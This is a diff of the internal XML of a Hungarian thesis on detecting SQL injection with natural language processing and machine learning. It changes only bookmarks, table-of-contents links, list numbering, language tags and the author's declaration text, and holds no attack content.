         <w:t>Irodalomjegyzék</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2876,7 +3748,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc69730702"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc70106707"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2886,7 +3758,7 @@
         </w:rPr>
         <w:t>Nyilatkozat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2975,7 +3847,19 @@
         <w:rPr>
           <w:color w:val="343434"/>
         </w:rPr>
-        <w:t xml:space="preserve"> diploma megszerzése érdekében. Kijelentem, hogy a dolgozatot más szakon korábban nem védtem meg, saját munkám eredménye, és csak a hivatkozott forrásokat (szakirodalom, eszközök, stb.) használtam fel. Tudomásul veszem, hogy szakdolgozatomat / diplomamunkámat a Szegedi Tudományegyetem Informatikai Intézet könyvtárában, a helyben olvasható könyvek között helyezik el.</w:t>
+        <w:t xml:space="preserve"> diploma megszerzése érdekében. Kijelentem, hogy a dolgozatot más szakon korábban nem védtem meg, saját munkám eredménye, és csak a hivatkozott forrásokat (szakirodalom, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="343434"/>
+        </w:rPr>
+        <w:t>eszközök</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="343434"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> stb.) használtam fel. Tudomásul veszem, hogy szakdolgozatomat / diplomamunkámat a Szegedi Tudományegyetem Informatikai Intézet könyvtárában, a helyben olvasható könyvek között helyezik el.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3049,7 +3933,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc69730703"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc70106708"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3059,7 +3943,7 @@
         </w:rPr>
         <w:t>Köszönetnyilvánítás</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3457,6 +4341,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0B903F65"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="77B03EA8"/>
+    <w:lvl w:ilvl="0" w:tplc="040E0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="17CE79CB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4490A8CE"/>
@@ -3569,7 +4566,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1FAF21C0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="6C0A3C60"/>
@@ -3691,7 +4688,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="20A815F0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A81EF0F2"/>
@@ -3804,7 +4801,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="316417F3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AE74433C"/>
@@ -3945,7 +4942,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="36260C9A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="25662176"/>
+    <w:lvl w:ilvl="0" w:tplc="040E0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1287" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2007" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2727" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3447" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4167" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4887" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5607" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6327" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7047" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66C264D6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CD9A3D8E"/>
@@ -4062,22 +5172,28 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="3">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="7">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="9">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -143,6 +143,7 @@
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -151,6 +152,7 @@
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>SQL injection detection using natural language processing systems and machine learning</w:t>
       </w:r>
@@ -658,7 +660,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc70106693"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc70610870"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -737,7 +739,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc70106694"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc70610871"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1434,7 +1436,6 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
-      <w:sdtEndPr/>
       <w:sdtContent>
         <w:p>
           <w:pPr>
@@ -1455,7 +1456,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:bookmarkStart w:id="4" w:name="_Toc70106695"/>
+          <w:bookmarkStart w:id="4" w:name="_Toc70610872"/>
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1483,7 +1484,6 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
@@ -1507,60 +1507,60 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc70106693" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610870" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Feladatkiírás</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610870 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Feladatkiírás</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106693 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1574,66 +1574,65 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106694" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610871" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Tartalmi összefoglaló</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610871 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Tartalmi összefoglaló</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106694 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1647,66 +1646,65 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106695" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610872" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Tartalomjegyzék</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610872 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Tartalomjegyzék</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106695 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1720,66 +1718,65 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106696" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610873" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>BEVEZETÉS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610873 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>BEVEZETÉS</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106696 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1794,24 +1791,22 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106697" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610874" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>1.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -1821,55 +1816,56 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>SQL INJECTION</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610874 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
